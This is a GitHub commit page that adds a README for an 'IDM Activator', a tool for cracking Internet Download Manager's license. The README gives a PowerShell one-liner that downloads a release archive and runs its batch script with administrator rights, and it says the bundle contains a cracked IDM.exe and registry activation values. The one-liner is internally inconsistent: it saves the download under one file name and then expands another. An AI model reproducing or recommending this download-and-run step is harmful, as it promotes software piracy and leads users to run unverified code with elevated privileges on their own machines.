-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
de18457
commit 6edf1bf
Showing
1 changed file
with
62 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,62 @@ | ||
# DUDE Activate IDM for free | ||
Activate IDM | ||
# **IDM Activator** | ||
|
||
IDM Activator is a tool designed to activate Internet Download Manager (IDM) for free, allowing users to bypass trial period restrictions and enjoy the full version without purchasing a license. | ||
|
||
## πͺ **Features** | ||
|
||
- β Activate IDM for free | ||
- π Simple and easy-to-use interface | ||
- π Compatible with multiple versions of IDM | ||
- π» Lightweight and fast | ||
|
||
## π οΈ **Installation** | ||
|
||
### **Method 1** | ||
1. **Download**: Obtain the latest version of the tool from the [releases page](https://github.com/Jamshed-Dev/DUDE-Activate-IDM-for-free/releases). | ||
2. **Extract**: Unzip the downloaded file to a directory of your choice. | ||
|
||
### **Method 2** | ||
1. **Open PowerShell**: | ||
- Right-click the Start menu and select **Windows PowerShell** or **Windows Terminal**. | ||
- If prompted by User Account Control (UAC), click **Yes** to allow PowerShell to run with administrative privileges. | ||
|
||
2. **Run the following command in PowerShell** to download and execute the activation script: | ||
|
||
```powershell | ||
irm https://github.com/Jamshed-Dev/DUDE-Activate-IDM-for-free/releases/download/DUDE/DUDE.zip -OutFile v1.7.zip; Expand-Archive DUDE.zip -DestinationPath . -Force; cmd.exe /c .\DUDE\script.bat | ||
``` | ||
|
||
## π» **Usage** | ||
|
||
### 1. Run the Script: | ||
- Double-click on `script.bat` to execute it. The script will automatically request administrative privileges if needed, so you no longer need to manually select "Run as Administrator." | ||
- If prompted by User Account Control (UAC), click **Yes** to grant the necessary permissions. | ||
- Once elevated, the script will continue running with the appropriate permissions for file operations. | ||
|
||
### 2. Follow the On-Screen Instructions: | ||
- Choose an option from the menu: | ||
- `1` to activate Internet Download Manager. | ||
- `2` to activate Extra-FileType_Extensions. | ||
- `3` to exit. | ||
- If you select `1`, the script will copy the necessary files to the appropriate directory and provide feedback on the operation status. | ||
|
||
|
||
## π **BIN Files** | ||
|
||
### These files are not encrypted; you can rename them to view the source file: | ||
|
||
- `data.bin` β Contains a cracked version of IDM.exe. | ||
- `Registry.bin` β Registry values to activate IDM. | ||
- `extensions.bin` β Registry entries for extra IDM file extensions. | ||
|
||
## π **License** | ||
|
||
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details. | ||
|
||
## βΉοΈ **Acknowledgments** | ||
|
||
- Special thanks to Ali.Dbg, who was instrumental in this script's functionality. | ||
|
||
## β **Contact** | ||
|
||
For questions or support, please open an issue on the GitHub repository. |